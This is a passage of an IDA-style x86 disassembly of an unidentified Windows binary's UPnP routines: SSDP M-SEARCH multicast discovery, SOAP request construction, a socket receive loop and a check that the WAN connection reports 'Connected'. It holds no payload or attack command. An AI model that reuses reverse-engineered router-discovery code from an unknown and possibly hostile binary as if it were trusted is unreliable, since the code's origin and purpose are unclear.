loc_9B5B57: ; CODE XREF: sub_9B5AC7+7F�j
mov eax, [ebp+var_8]
xor edi, edi
loc_9B5B5C: ; CODE XREF: sub_9B5AC7+39�j
mov edx, eax
loc_9B5B5E: ; CODE XREF: sub_9B5AC7+2D�j
; sub_9B5AC7+31�j ...
mov esi, eax
cmp esi, [ebp+arg_0]
jl loc_9B5ADD
loc_9B5B69: ; CODE XREF: sub_9B5AC7+10�j
pop edi
pop esi
leave
retn
sub_9B5AC7 endp
; =============== S U B R O U T I N E =======================================
sub_9B5B6D proc near ; CODE XREF: sub_9B5BC5+E0�p
; sub_9B5BC5+ED�p ...
cmp byte ptr [esi], 68h
push edi
mov edi, eax
jnz short loc_9B5B9E
cmp byte ptr [esi+1], 74h
jnz short loc_9B5B9E
cmp byte ptr [esi+2], 74h
jnz short loc_9B5B9E
cmp byte ptr [esi+3], 70h
jnz short loc_9B5B9E
cmp byte ptr [esi+4], 3Ah
jnz short loc_9B5B9E
cmp byte ptr [esi+5], 2Fh
jnz short loc_9B5B9E
cmp byte ptr [esi+6], 2Fh
jnz short loc_9B5B9E
push edi
push esi
push ebx
jmp short loc_9B5BBA
; ---------------------------------------------------------------------------
loc_9B5B9E: ; CODE XREF: sub_9B5B6D+6�j
; sub_9B5B6D+C�j ...
push ebx ; Str
call strlen
cmp byte ptr [esi], 2Fh
pop ecx
jz short loc_9B5BAF
mov byte ptr [eax+ebx], 2Fh
inc eax
loc_9B5BAF: ; CODE XREF: sub_9B5B6D+3B�j
cmp eax, edi
jg short loc_9B5BC3
sub edi, eax
push edi ; Count
push esi ; Source
add eax, ebx
push eax ; Dest
loc_9B5BBA: ; CODE XREF: sub_9B5B6D+2F�j
call strncpy
add esp, 0Ch
loc_9B5BC3: ; CODE XREF: sub_9B5B6D+44�j
pop edi
retn
sub_9B5B6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5BC5(int,size_t Count,char *Source)
sub_9B5BC5 proc near ; CODE XREF: sub_9B5DA4+96�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Count = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov edi, [ebp+Count]
lea eax, [edi+80h]
push eax ; Str
mov [ebp+var_8], eax
call strlen
mov esi, eax
test esi, esi
pop ecx
jnz short loc_9B5BF2
push [ebp+Source] ; Str
call strlen
pop ecx
mov esi, eax
loc_9B5BF2: ; CODE XREF: sub_9B5BC5+20�j
lea eax, [edi+404h]
inc esi
inc esi
push eax ; Str
mov [ebp+Count], esi
mov [ebp+var_4], esi
mov [ebp+var_C], eax
call strlen
add esi, eax
lea eax, [edi+304h]
push eax ; Str
mov [ebp+var_10], eax
call strlen
add [ebp+Count], eax
add edi, 104h
push edi ; Str
mov [ebp+var_14], edi
call strlen
mov ebx, malloc
add [ebp+var_4], eax
mov edi, [ebp+arg_0]
push esi ; Size
call ebx ; malloc
push [ebp+Count] ; Size
mov [edi+4], eax
call ebx ; malloc
push [ebp+var_4] ; Size
mov [edi], eax
call ebx ; malloc
mov ebx, strncpy
mov [edi+8], eax
mov eax, [ebp+var_8]
add esp, 18h
cmp byte ptr [eax], 0
push esi ; Count
jz short loc_9B5C62
push eax
jmp short loc_9B5C65
; ---------------------------------------------------------------------------
loc_9B5C62: ; CODE XREF: sub_9B5BC5+98�j
push [ebp+Source] ; Source
loc_9B5C65: ; CODE XREF: sub_9B5BC5+9B�j
push dword ptr [edi+4] ; Dest
call ebx ; strncpy
mov eax, [edi+4]
add esp, 0Ch
add eax, 7
push 2Fh ; Val
push eax ; Str
call strchr
test eax, eax
pop ecx
pop ecx
jz short loc_9B5C85
mov byte ptr [eax], 0
loc_9B5C85: ; CODE XREF: sub_9B5BC5+BB�j
push [ebp+Count] ; Count
push dword ptr [edi+4] ; Source
push dword ptr [edi] ; Dest
call ebx ; strncpy
push [ebp+var_4] ; Count
push dword ptr [edi+4] ; Source
push dword ptr [edi+8] ; Dest
call ebx ; strncpy
mov ebx, [edi+4]
mov eax, esi
mov esi, [ebp+var_C]
add esp, 18h
call sub_9B5B6D
mov eax, [ebp+Count]
mov esi, [ebp+var_10]
mov ebx, [edi]
call sub_9B5B6D
mov eax, [ebp+var_4]
mov esi, [ebp+var_14]
mov ebx, [edi+8]
call sub_9B5B6D
pop edi
pop esi
pop ebx
leave
retn
sub_9B5BC5 endp
; =============== S U B R O U T I N E =======================================
sub_9B5CCA proc near ; CODE XREF: sub_9B5DA4+B6�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B5CF7
push edi
push dword ptr [esi] ; Memory
mov edi, free
call edi ; free
push dword ptr [esi+4] ; Memory
and dword ptr [esi], 0
call edi ; free
push dword ptr [esi+8] ; Memory
and dword ptr [esi+4], 0
call edi ; free
add esp, 0Ch
and dword ptr [esi+8], 0
pop edi
loc_9B5CF7: ; CODE XREF: sub_9B5CCA+7�j
pop esi
retn
sub_9B5CCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5CF9(SOCKET s,char *buf,int len,int)
sub_9B5CF9 proc near ; CODE XREF: sub_9B5139:loc_9B531A�p
; sub_9B5E93+268�p ...
readfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
buf = dword ptr 0Ch
len = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
push esi
mov esi, [ebp+s]
mov [ebp+readfds.fd_array], esi
mov [ebp+readfds.fd_count], 1
mov [ebp+timeout.tv_sec], eax
imul edx, 3E8h
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push 40h ; nfds
mov [ebp+timeout.tv_usec], edx
call select
test eax, eax
jge short loc_9B5D4D
or eax, 0FFFFFFFFh
jmp short loc_9B5D62
; ---------------------------------------------------------------------------
loc_9B5D4D: ; CODE XREF: sub_9B5CF9+4D�j
jnz short loc_9B5D53
xor eax, eax
jmp short loc_9B5D62
; ---------------------------------------------------------------------------
loc_9B5D53: ; CODE XREF: sub_9B5CF9:loc_9B5D4D�j
push 0 ; flags
push [ebp+len] ; len
push [ebp+buf] ; buf
push esi ; s
call recv
loc_9B5D62: ; CODE XREF: sub_9B5CF9+52�j
; sub_9B5CF9+58�j
pop esi
leave
retn
sub_9B5CF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B5D65 proc near ; CODE XREF: sub_9B5DA4+A8�p
Source = byte ptr -40h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
push 0 ; Dest
lea eax, [ebp+arg_4]
push eax ; int
lea eax, [ebp+Source]
push eax ; Source
mov eax, [ebp+arg_4]
add eax, 484h
push eax ; int
mov eax, [ebp+arg_0]
push dword ptr [eax] ; Str
mov [ebp+Source], 0
call sub_9B644D
lea eax, [ebp+Source]
push eax ; Str2
push offset aConnected ; "Connected"
call strcmp
add esp, 1Ch
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9B5D65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5DA4(int,int,void *Count,int netshort,int)
sub_9B5DA4 proc near ; CODE XREF: sub_9AA0F1+64�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Count = dword ptr 10h
netshort = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
jnz short loc_9B5DB9
leave
retn
; ---------------------------------------------------------------------------
loc_9B5DB9: ; CODE XREF: sub_9B5DA4+11�j
push esi
mov esi, [ebp+Count]
push ebx
mov [ebp+var_4], 1
push edi
loc_9B5DC6: ; CODE XREF: sub_9B5DA4+DD�j
mov edi, [ebp+arg_0]
loc_9B5DC9: ; CODE XREF: sub_9B5DA4+D0�j
push [ebp+arg_10] ; Count
lea eax, [ebp+var_C]
push [ebp+netshort] ; netshort
push eax ; int
push dword ptr [edi+4] ; Str
call sub_9B5440
mov ebx, eax
add esp, 10h
test ebx, ebx
jz loc_9B5E70
inc [ebp+var_8]
push 704h ; Size
push 0 ; Val
push esi ; Dst
call memset
push 0Ch ; Size
push 0 ; Val
push [ebp+arg_4] ; Dst
call memset
push esi
push [ebp+var_C]
push ebx
call sub_9B5A22
push ebx ; Memory
call free
lea eax, [esi+284h]
push offset aUrnSchemasUpnp ; "urn:schemas-upnp-org:service:WANCommonI"...
push eax ; Str1
call strcmp
add esp, 30h
test eax, eax
jz short loc_9B5E33
cmp [ebp+var_4], 3
jl short loc_9B5E60
loc_9B5E33: ; CODE XREF: sub_9B5DA4+87�j
push dword ptr [edi+4] ; Source
push esi ; Count
push [ebp+arg_4] ; int
call sub_9B5BC5
add esp, 0Ch
cmp [ebp+var_4], 2
jge short loc_9B5E8E
push esi
push [ebp+arg_4]
call sub_9B5D65
test eax, eax
pop ecx
pop ecx
jnz short loc_9B5E8E
push [ebp+arg_4]
call sub_9B5CCA
pop ecx
loc_9B5E60: ; CODE XREF: sub_9B5DA4+8D�j
push 704h ; Size
push 0 ; Val
push esi ; Dst
call memset
add esp, 0Ch
loc_9B5E70: ; CODE XREF: sub_9B5DA4+3E�j
mov edi, [edi]
test edi, edi
jnz loc_9B5DC9
inc [ebp+var_4]
cmp [ebp+var_4], 3
jle loc_9B5DC6
xor eax, eax
loc_9B5E89: ; CODE XREF: sub_9B5DA4+ED�j
pop edi
pop ebx
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_9B5E8E: ; CODE XREF: sub_9B5DA4+A2�j
; sub_9B5DA4+B1�j
mov eax, [ebp+var_4]
jmp short loc_9B5E89
sub_9B5DA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5E93(SOCKET s,char *Str,int,int,int,int,int)
sub_9B5E93 proc near ; CODE XREF: sub_9B644D+49�p
; sub_9B658C+52�p ...
var_8F0 = byte ptr -8F0h
Dest = byte ptr -0F0h
cp = byte ptr -70h
name = sockaddr ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
buf = dword ptr -0Ch
len = word ptr -8
var_4 = dword ptr -4
s = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 8F0h
and dword ptr [ebp+len], 0
push ebx
mov ebx, [ebp+arg_C]
push esi
mov esi, _snprintf
push edi
push ebx
push [ebp+arg_8]
lea eax, [ebp+Dest]
push offset aSS ; "%s#%s"
push 80h ; Count
push eax ; Dest
call esi ; _snprintf
mov edi, [ebp+arg_10]
add esp, 14h
test edi, edi
lea eax, [ebp+var_8F0]
jnz short loc_9B5EED
push ebx
push [ebp+arg_8]
push ebx
push offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<s:Envelope xmln"...
push 800h ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 18h
jmp loc_9B5FA4
; ---------------------------------------------------------------------------
loc_9B5EED: ; CODE XREF: sub_9B5E93+3E�j
push [ebp+arg_8]
push ebx
push offset a?xmlVersion1_1 ; "<?xml version=\"1.0\"?>\r\n<s:Envelope xmln"...
push 800h ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 14h
lea eax, [ebp+eax+var_8F0]
jmp short loc_9B5F5B
; ---------------------------------------------------------------------------
loc_9B5F0A: ; CODE XREF: sub_9B5E93+CC�j
lea ecx, [eax+64h]
lea esi, [ebp+Dest]
cmp esi, ecx
jbe short loc_9B5F77
mov byte ptr [eax], 3Ch
inc eax
mov esi, edx
jmp short loc_9B5F23
; ---------------------------------------------------------------------------
loc_9B5F1F: ; CODE XREF: sub_9B5E93+94�j
mov [eax], cl
inc eax
inc esi
loc_9B5F23: ; CODE XREF: sub_9B5E93+8A�j
mov cl, [esi]
test cl, cl
jnz short loc_9B5F1F
mov esi, [edi+4]
mov byte ptr [eax], 3Eh
inc eax
test esi, esi
jz short loc_9B5F40
jmp short loc_9B5F3A
; ---------------------------------------------------------------------------
loc_9B5F36: ; CODE XREF: sub_9B5E93+AB�j
mov [eax], cl
inc eax
inc esi
loc_9B5F3A: ; CODE XREF: sub_9B5E93+A1�j
mov cl, [esi]
test cl, cl
jnz short loc_9B5F36
loc_9B5F40: ; CODE XREF: sub_9B5E93+9F�j
mov byte ptr [eax], 3Ch
inc eax
mov byte ptr [eax], 2Fh
inc eax
jmp short loc_9B5F4E
; ---------------------------------------------------------------------------
loc_9B5F4A: ; CODE XREF: sub_9B5E93+BF�j
mov [eax], cl
inc eax
inc edx
loc_9B5F4E: ; CODE XREF: sub_9B5E93+B5�j
mov cl, [edx]
test cl, cl
jnz short loc_9B5F4A
mov byte ptr [eax], 3Eh
inc eax
add edi, 8
loc_9B5F5B: ; CODE XREF: sub_9B5E93+75�j
mov edx, [edi]
test edx, edx
jnz short loc_9B5F0A
mov cl, [ebx]
mov byte ptr [eax], 3Ch
inc eax
mov byte ptr [eax], 2Fh
inc eax
mov byte ptr [eax], 6Dh
inc eax
mov byte ptr [eax], 3Ah
inc eax
mov edx, ebx
jmp short loc_9B5F88
; ---------------------------------------------------------------------------
loc_9B5F77: ; CODE XREF: sub_9B5E93+82�j
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
jmp loc_9B6019
; ---------------------------------------------------------------------------
loc_9B5F82: ; CODE XREF: sub_9B5E93+F7�j
mov [eax], cl
inc eax
inc edx
mov cl, [edx]
loc_9B5F88: ; CODE XREF: sub_9B5E93+E2�j
test cl, cl
jnz short loc_9B5F82
lea ecx, [ebp+Dest]
sub ecx, eax
push ecx ; Count
push offset aSBodySEnvelope ; "></s:Body></s:Envelope>\r\n"
push eax ; Dest
call strncpy
add esp, 0Ch
loc_9B5FA4: ; CODE XREF: sub_9B5E93+55�j
lea eax, [ebp+var_1C]
push eax ; int
lea eax, [ebp+len]
push eax ; int
lea eax, [ebp+cp]
push eax ; Dest
push [ebp+Str] ; Str
call sub_9B5345
add esp, 10h
test eax, eax
jz short loc_9B6019
xor esi, esi
cmp [ebp+s], esi
jge short loc_9B6021
push esi ; protocol
push 1 ; type
push 2 ; af
call socket
cmp eax, esi
mov [ebp+s], eax
jl short loc_9B6014
push dword ptr [ebp+len] ; netshort
mov [ebp+name.sa_family], 2
call ntohs
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+cp]
push eax ; cp
call __imp_inet_addr
mov dword ptr [ebp+name.sa_data+2], eax
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
push [ebp+s] ; s
call connect
test eax, eax
jge short loc_9B6021
push [ebp+s] ; s
call closesocket
loc_9B6014: ; CODE XREF: sub_9B5E93+143�j
mov eax, [ebp+arg_18]
mov [eax], esi
loc_9B6019: ; CODE XREF: sub_9B5E93+EA�j
; sub_9B5E93+12A�j
or eax, 0FFFFFFFFh
jmp loc_9B6118
; ---------------------------------------------------------------------------
loc_9B6021: ; CODE XREF: sub_9B5E93+131�j
; sub_9B5E93+176�j
lea eax, [ebp+var_8F0]
push eax ; Str
lea eax, [ebp+Dest]
push eax ; int
push dword ptr [ebp+len] ; len
lea eax, [ebp+cp]
push eax ; int
push [ebp+var_1C] ; int
push [ebp+s] ; s
call sub_9B596E
add esp, 18h
test eax, eax
jg short loc_9B6050
or esi, 0FFFFFFFFh
jmp loc_9B610D
; ---------------------------------------------------------------------------
loc_9B6050: ; CODE XREF: sub_9B5E93+1B3�j
mov esi, [ebp+arg_18]
mov eax, [esi]
mov ebx, [ebp+arg_14]
or [ebp+var_18], 0FFFFFFFFh
or [ebp+var_10], 0FFFFFFFFh
and dword ptr [esi], 0
push 1388h
push eax
mov [ebp+buf], ebx
mov [ebp+var_4], eax
push ebx
jmp loc_9B60F8
; ---------------------------------------------------------------------------
loc_9B6075: ; CODE XREF: sub_9B5E93+272�j
sub [ebp+var_4], eax
add [ebp+buf], eax
add [esi], eax
mov eax, [esi]
add eax, ebx
cmp ebx, eax
mov edi, ebx
mov [ebp+var_14], eax
jnb short loc_9B60D9
mov al, [ebx]
loc_9B608C: ; CODE XREF: sub_9B5E93+23B�j
and [ebp+arg_10], 0
cmp al, 0Dh
jz short loc_9B60A7
mov ecx, edi
loc_9B6096: ; CODE XREF: sub_9B5E93+212�j
cmp al, 0Dh
jz short loc_9B60A7
cmp ecx, [ebp+var_14]
jnb short loc_9B60D9
inc [ebp+arg_10]
inc ecx
mov al, [ecx]
jmp short loc_9B6096
; ---------------------------------------------------------------------------
loc_9B60A7: ; CODE XREF: sub_9B5E93+1FF�j
; sub_9B5E93+205�j
mov eax, [ebp+arg_10]
mov ecx, edi
call sub_9B5A5F
test eax, eax
jle short loc_9B60B8
mov [ebp+var_18], eax
loc_9B60B8: ; CODE XREF: sub_9B5E93+220�j
mov eax, [ebp+arg_10]
lea edi, [edi+eax+2]
mov al, [edi]
cmp al, 0Dh
jnz short loc_9B60CB
cmp byte ptr [edi+1], 0Ah
jz short loc_9B60D2
loc_9B60CB: ; CODE XREF: sub_9B5E93+230�j
cmp edi, [ebp+var_14]
jb short loc_9B608C
jmp short loc_9B60D9
; ---------------------------------------------------------------------------
loc_9B60D2: ; CODE XREF: sub_9B5E93+236�j
sub edi, ebx
inc edi
inc edi
mov [ebp+var_10], edi
loc_9B60D9: ; CODE XREF: sub_9B5E93+1F5�j
; sub_9B5E93+20A�j ...
mov ecx, [ebp+var_18]
test ecx, ecx
jle short loc_9B60ED
mov eax, [ebp+var_10]
test eax, eax
jle short loc_9B60ED
add eax, ecx
cmp [esi], eax
jge short loc_9B610B
loc_9B60ED: ; CODE XREF: sub_9B5E93+24B�j
; sub_9B5E93+252�j
push 1388h ; int
push [ebp+var_4] ; len
push [ebp+buf] ; buf
loc_9B60F8: ; CODE XREF: sub_9B5E93+1DD�j
push [ebp+s] ; s
call sub_9B5CF9
add esp, 10h
test eax, eax
jg loc_9B6075
loc_9B610B: ; CODE XREF: sub_9B5E93+258�j
xor esi, esi
loc_9B610D: ; CODE XREF: sub_9B5E93+1B8�j
push [ebp+s] ; s
call closesocket
mov eax, esi
loc_9B6118: ; CODE XREF: sub_9B5E93+189�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B5E93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B611D(int,char *cp,int,int)
sub_9B611D proc near ; CODE XREF: sub_9AA0F1+3C�p
buf = byte ptr -644h
to = sockaddr ptr -44h
Dst = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
optval = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
Src = dword ptr -18h
var_14 = dword ptr -14h
Size = dword ptr -10h
var_C = dword ptr -0Ch
s = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
cp = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 644h
push edi
push 11h ; protocol
push 2 ; type
xor edi, edi
push 2 ; af
mov [ebp+var_4], edi
mov dword ptr [ebp+optval], 1
call socket
cmp eax, edi
mov [ebp+s], eax
jge short loc_9B614D
xor eax, eax
jmp loc_9B6293
; ---------------------------------------------------------------------------
loc_9B614D: ; CODE XREF: sub_9B611D+27�j
push ebx
push esi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call memset
mov esi, ntohs
add esp, 0Ch
cmp [ebp+arg_C], edi
mov [ebp+Dst], 2
mov ebx, 76Ch
jz short loc_9B617B
push ebx ; netshort
call esi ; ntohs
mov [ebp+var_32], ax
loc_9B617B: ; CODE XREF: sub_9B611D+55�j
push 10h ; Size
lea eax, [ebp+to]
push edi ; Val
push eax ; Dst
mov [ebp+var_30], edi
call memset
add esp, 0Ch
push ebx ; netshort
mov [ebp+to.sa_family], 2
call esi ; ntohs
mov esi, __imp_inet_addr
push offset cp ; "239.255.255.250"
mov word ptr [ebp+to.sa_data], ax
call esi ; __imp_inet_addr
mov ebx, setsockopt
push 4 ; optlen
mov dword ptr [ebp+to.sa_data+2], eax
lea eax, [ebp+optval]
push eax ; optval
push 4 ; optname
push 0FFFFh ; level
push [ebp+s] ; s
call ebx ; setsockopt
test eax, eax
jge short loc_9B61CD
xor eax, eax
jmp loc_9B6291
; ---------------------------------------------------------------------------
loc_9B61CD: ; CODE XREF: sub_9B611D+A7�j
cmp [ebp+cp], edi
jz short loc_9B61EB
push [ebp+cp] ; cp
call esi ; __imp_inet_addr
push 4 ; optlen
mov [ebp+Size], eax
mov [ebp+var_30], eax
lea eax, [ebp+Size]
push eax ; optval
push 9 ; optname
push edi ; level
push [ebp+s] ; s
call ebx ; setsockopt
loc_9B61EB: ; CODE XREF: sub_9B611D+B3�j
push 10h ; namelen
lea eax, [ebp+Dst]
push eax ; name
push [ebp+s] ; s
call bind
test eax, eax
jnz loc_9B6286
mov [ebp+var_1C], edi
mov [ebp+var_C], offset off_9A6D1C
jmp short loc_9B6210
; ---------------------------------------------------------------------------
loc_9B620E: ; CODE XREF: sub_9B611D+1A8�j
; sub_9B611D+1B2�j ...
xor edi, edi
loc_9B6210: ; CODE XREF: sub_9B611D+EF�j
; sub_9B611D+164�j
cmp [ebp+var_1C], edi
jnz short loc_9B6254
mov eax, [ebp+var_C]
push dword ptr [eax]
lea eax, [ebp+buf]
push offset aMSearchHttp1_1 ; "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255."...
push 600h ; Count
push eax ; Dest
call _snprintf
add [ebp+var_C], 4
add esp, 10h
push 10h ; tolen
lea ecx, [ebp+to]
push ecx ; to
push edi ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call sendto
test eax, eax
jl short loc_9B6283
loc_9B6254: ; CODE XREF: sub_9B611D+F6�j
push [ebp+arg_0] ; int
lea eax, [ebp+buf]
push 600h ; len
push eax ; buf
push [ebp+s] ; s
call sub_9B5CF9
add esp, 10h
cmp eax, edi
mov [ebp+var_1C], eax
jl short loc_9B6283
jnz short loc_9B6296
cmp [ebp+var_4], edi
jnz short loc_9B6283
mov eax, [ebp+var_C]
cmp [eax], edi
jnz short loc_9B6210
loc_9B6283: ; CODE XREF: sub_9B611D+135�j
; sub_9B611D+156�j ...
mov edi, [ebp+var_4]
loc_9B6286: ; CODE XREF: sub_9B611D+DF�j
push [ebp+s] ; s
call closesocket
mov eax, edi
loc_9B6291: ; CODE XREF: sub_9B611D+AB�j
pop esi
pop ebx
loc_9B6293: ; CODE XREF: sub_9B611D+2B�j
pop edi
leave
retn
; ---------------------------------------------------------------------------
loc_9B6296: ; CODE XREF: sub_9B611D+158�j
lea ecx, [ebp+var_20]
push ecx
lea ecx, [ebp+var_14]
push ecx
lea ecx, [ebp+Size]
push ecx
lea ecx, [ebp+Src]
push ecx
push eax
lea ebx, [ebp+buf]
mov [ebp+Src], edi
mov [ebp+Size], edi
mov [ebp+var_14], edi
mov [ebp+var_20], edi
call sub_9B5AC7
add esp, 14h
cmp [ebp+var_14], 0
jz loc_9B620E
cmp [ebp+Src], 0
jz loc_9B620E
mov edi, [ebp+var_20]
mov ebx, [ebp+Size]
lea eax, [edi+ebx+10h]
push eax ; Size
call malloc
mov esi, eax
mov eax, [ebp+var_4]
push ebx ; Size
push [ebp+Src] ; Src
lea ecx, [esi+0Ch]
mov [esi], eax
lea eax, [esi+ebx+0Dh]
push ecx ; Dst
mov [esi+4], ecx
mov [esi+8], eax
call memcpy
push edi ; Size
push [ebp+var_14] ; Src
lea eax, [esi+ebx+0Dh]
push eax ; Dst
mov byte ptr [esi+ebx+0Ch], 0
call memcpy
lea eax, [esi+edi]
add esp, 1Ch
mov byte ptr [eax+ebx+0Dh], 0
mov [ebp+var_4], esi
jmp loc_9B620E
sub_9B611D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B632A(int,void *Src,size_t Size)
sub_9B632A proc near ; DATA XREF: sub_9B63B6+20�o
arg_0 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+Size]
cmp edi, 3Fh
jle short loc_9B6338
push 3Fh
pop edi
loc_9B6338: ; CODE XREF: sub_9B632A+9�j
mov esi, [esp+8+arg_0]
push edi ; Size
push [esp+0Ch+Src] ; Src
lea eax, [esi+4]
push eax ; Dst
call memcpy
add esp, 0Ch
mov byte ptr [esi+edi+4], 0
pop edi
pop esi
retn
sub_9B632A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B6355(int,void *Src,size_t Size)
sub_9B6355 proc near ; DATA XREF: sub_9B63B6+2A�o
arg_0 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebx
push esi
push edi
push 88h ; Size
call malloc
mov ebx, [esp+10h+Size]
cmp ebx, 3Fh
pop ecx
mov esi, eax
jle short loc_9B6372
push 3Fh
pop ebx
loc_9B6372: ; CODE XREF: sub_9B6355+18�j
mov edi, [esp+0Ch+arg_0]
push 40h ; Count
lea eax, [edi+4]
push eax ; Source
lea eax, [esi+8]
push eax ; Dest
call strncpy
push ebx ; Size
push [esp+1Ch+Src] ; Src
lea eax, [esi+48h]
push eax ; Dst
mov byte ptr [esi+47h], 0
call memcpy
mov byte ptr [esi+ebx+48h], 0
mov eax, [edi]
add esp, 18h
test eax, eax
mov [esi], eax
jz short loc_9B63AD
mov eax, [edi]
mov [eax+4], esi
loc_9B63AD: ; CODE XREF: sub_9B6355+51�j
mov [edi], esi
mov [esi+4], edi
pop edi
pop esi
pop ebx
retn
sub_9B6355 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B63B6 proc near ; CODE XREF: sub_9B644D+5C�p
; sub_9B658C+65�p ...
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_0]
xor ecx, ecx
mov [eax], ecx
mov [ebp+var_14], eax
mov [ebp+var_24], edx
mov edx, [ebp+arg_4]
lea eax, [ebp+var_24]
push eax
mov [ebp+var_18], edx
mov [ebp+var_10], offset sub_9B632A
mov [ebp+var_C], ecx
mov [ebp+var_8], offset sub_9B6355
mov [ebp+var_4], ecx
call sub_9B5746
pop ecx
leave
retn
sub_9B63B6 endp
; =============== S U B R O U T I N E =======================================
sub_9B63F2 proc near ; CODE XREF: sub_9B644D+132�p
; sub_9B658C+C5�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
jmp short loc_9B6414
; ---------------------------------------------------------------------------
loc_9B63F9: ; CODE XREF: sub_9B63F2+26�j
mov ecx, [eax]
test ecx, ecx
jz short loc_9B6405
mov edx, [eax+4]
mov [ecx+4], edx
loc_9B6405: ; CODE XREF: sub_9B63F2+B�j
mov ecx, [eax+4]
mov edx, [eax]
push eax ; Memory
mov [ecx], edx
call free
pop ecx
loc_9B6414: ; CODE XREF: sub_9B63F2+5�j
mov eax, [esi]
test eax, eax
jnz short loc_9B63F9
pop esi
retn
sub_9B63F2 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B641C(int,char *Str2)
sub_9B641C proc near ; CODE XREF: sub_9B644D+6A�p
; sub_9B644D+7B�p ...
arg_0 = dword ptr 4
Str2 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
push edi
xor edi, edi
jmp short loc_9B6444
; ---------------------------------------------------------------------------
loc_9B6428: ; CODE XREF: sub_9B641C+2A�j
test edi, edi
jnz short loc_9B6448
push [esp+8+Str2] ; Str2
lea eax, [esi+8]
push eax ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B6442
lea edi, [esi+48h]
loc_9B6442: ; CODE XREF: sub_9B641C+21�j
mov esi, [esi]
loc_9B6444: ; CODE XREF: sub_9B641C+A�j
test esi, esi
jnz short loc_9B6428
loc_9B6448: ; CODE XREF: sub_9B641C+E�j
mov eax, edi
pop edi
pop esi
retn
sub_9B641C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B644D(char *Str,int,char *Source,int,char *Dest)
sub_9B644D proc near ; CODE XREF: sub_9B5D65+22�p
var_1054 = dword ptr -1054h
var_54 = dword ptr -54h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Source = dword ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1054h
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+Source]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_C], 1000h
jnz short loc_9B647D
cmp [ebp+arg_C], ebx
jnz short loc_9B647D
push 0FFFFFFFEh
pop eax
jmp loc_9B6588
; ---------------------------------------------------------------------------
loc_9B647D: ; CODE XREF: sub_9B644D+21�j
; sub_9B644D+26�j
